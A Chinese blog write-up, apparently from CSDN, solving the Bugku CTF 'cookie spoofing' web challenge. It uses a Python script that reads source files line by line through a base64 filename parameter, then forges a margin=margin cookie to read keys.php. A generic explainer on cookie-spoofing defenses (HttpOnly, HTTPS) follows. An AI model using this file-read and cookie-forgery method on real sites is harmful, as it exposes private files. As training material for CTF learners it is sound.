bugku-web-cookie欺骗

本文介绍了一种通过将目标文件名转换为Base64编码并利用特定URL参数来绕过应用程序文件读取限制的方法。通过构造特定的URL请求并使用PHP脚本逐行读取文件,成功获取了敏感文件内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

url上有base64,解密得到filename=key.txt
index.php用base64加密
同样方法,把加密后的字符串,放到filename的参数中,回车
查看源代码,发现

<?php

猜测 url中
line参数可能控制了,每次读取的行数
简单测试一下 line=1
返回error_reporting(0);
写个脚本,自己手动慢慢一行一行出来也行

import requests
s=requests.session()
url='http://120.24.86.145:8002/web11/index.php'
for i in range(0,30):
    payload={'line':i,'filename':'aW5kZXgucGhw'}
    a=s.get(url,params=payload).content                
    a=a.decode('utf-8')
    print(a)

简单整理一下跑出来的代码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

很清楚了,这里构造keys.php的base64 作为filename的参数
再添加cookie,margin=margin 来读取keys.php的内容
用bp抓包
修改参数
这里写图片描述
得到flag

### 关于Cookie欺骗漏洞及其解决方案 #### Cookie欺骗概述 Cookie欺骗是指攻击者通过各种手段获取用户的敏感Cookie信息,并利用这些信息冒充合法用户访问受保护的Web应用。当COOKIE的HTTPOnly flag没有设置时,对于很多只依赖于cookie验证的网站来说存在较大风险[^1]。 #### CTF比赛中常见场景 在CTF竞赛环境中,参赛队伍可能会遇到涉及Cookie管理不当的应用程序。这类题目通常考察选手对Web安全的理解程度以及如何有效防护此类威胁的能力。例如,在某些情况下,如果开发者未能正确配置HttpOnly属性,则可能导致JavaScript能够读取并操控Cookies,从而被用来实施跨站脚本攻击(XSS),进而窃取会话令牌等重要数据[^2]。 #### 防护措施建议 为了防止Cookie欺骗的发生,应采取以下几种方法: - **启用 HttpOnly 属性**:确保所有的身份认证相关的 Cookies都设置了`HttpOnly`标志位,使得客户端脚本无法访问它们。 ```http Set-Cookie: sessionId=abcde; Path=/; Secure; HttpOnly; ``` - **采用 HTTPS 进行传输加密**:强制使用SSL/TLS连接来保障通信过程中的安全性,避免中间人劫持或篡改请求响应报文中携带的信息。 - **定期更新和轮转密钥材料**:缩短Session有效期的同时引入更复杂的随机数生成算法,增加破解难度。 - **实现严格的同源策略控制**:限制第三方站点加载资源或者发起跨域请求的可能性,减少潜在的风险暴露面。 #### 实战演练案例分析 假设在一个模拟环境下的CTF挑战里,给定了一款在线商城平台作为靶场对象。经过初步侦查发现该系统的登录接口存在明显的缺陷——即未开启上述提到的关键选项之一。此时可以通过构造恶意链接诱导受害者点击触发XSS事件,最终成功捕获到对方浏览器内的真实凭证。然而这只是第一步;后续还需要进一步挖掘其他逻辑错误点才能完成整个攻防流程的设计思路转换。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值